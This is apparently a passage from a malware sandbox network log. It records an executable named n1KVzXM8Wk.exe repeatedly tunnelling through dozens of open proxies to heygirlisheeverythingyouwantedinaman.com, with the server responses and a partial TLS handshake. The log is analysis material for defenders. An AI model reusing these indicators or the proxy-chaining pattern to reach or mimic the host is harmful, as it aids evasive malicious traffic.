                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1373192.168.2.45391760.188.102.225180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.999520063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1374192.168.2.454063172.67.182.96806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.010088921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.099338055 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1375192.168.2.453513162.215.223.71626916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.011622906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.116154909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1376192.168.2.45396131.169.80.16510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.012502909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1377192.168.2.45392647.93.114.68886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.013813972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.369539022 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.10.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1378192.168.2.453935103.154.112.34350106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.050553083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1379192.168.2.454013104.238.111.107360496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.057925940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.556004047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.109488010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147118092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1380192.168.2.45075845.117.179.24085206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.057934999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1381192.168.2.45395659.6.26.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.058129072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1382192.168.2.45399813.37.89.20131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.058235884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.227757931 CET150INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/3.5.28
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1383192.168.2.453483161.97.160.158589436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.062397957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1384192.168.2.454006207.180.234.139149606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.068945885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1385192.168.2.454051134.209.189.42806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.083153963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.243690968 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1386192.168.2.454026195.30.84.215328586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.093868971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680655956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.365878105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.475153923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.681493998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.865922928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084259033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.381555080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.599884987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1387192.168.2.45399264.43.89.12863876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.093998909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.424822092 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1388192.168.2.453783184.170.249.6541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.128674030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1389192.168.2.45332327.147.24.20580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.129278898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.563774109 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1390192.168.2.4529825.182.87.176333606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.162491083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.240791082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.317138910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.443941116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1391192.168.2.454043194.146.110.22810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.162693024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680815935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.365951061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680888891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179249048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681972027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178694010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1392192.168.2.454030176.98.81.8580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.162895918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1393192.168.2.45403737.46.241.247806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.163256884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1394192.168.2.453628141.94.174.6384286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.163460970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.555877924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1395192.168.2.453041103.230.126.123605116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.163923979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1396192.168.2.454048158.160.141.13910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.164519072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.379007101 CET47INHTTP/1.1 502 Bad Gateway
                                                                                                      content-length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1397192.168.2.4539718.217.187.52240026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.164788961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1398192.168.2.454019177.38.245.110557136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.165106058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1399192.168.2.45094851.89.173.40301996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.166162968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1400192.168.2.454011193.151.130.11480866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.166348934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1401192.168.2.45397842.98.10.34806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.181931973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.508045912 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:44:46 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1402192.168.2.45406947.88.3.1980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.182265043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1403192.168.2.45405865.1.244.232806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.198582888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.474761009 CET159INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: ASP.NET
                                                                                                      Server: support@arraynetworks.net
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:27.477555037 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 27 13 f9 13 d7 b6 59 51 b8 c3 17 d8 3d 2a 94 80 1b f7 c9 8e c4 49 bb c8 64 c6 77 93 0b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e['YQ=*Idw*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#;"zI@W,q`b>I
                                                                                                      Feb 23, 2024 09:45:27.754827976 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 ff f4 87 eb ff c9 d1 c0 b9 44 f8 6d 17 24 7e 84 20 53 4a bc f7 da e7 8d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                                      Data Ascii: =9Dm$~ SJDOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223082251Z260222082251Z03110/U(heygirlisheeverythingyouwantedinaman.c
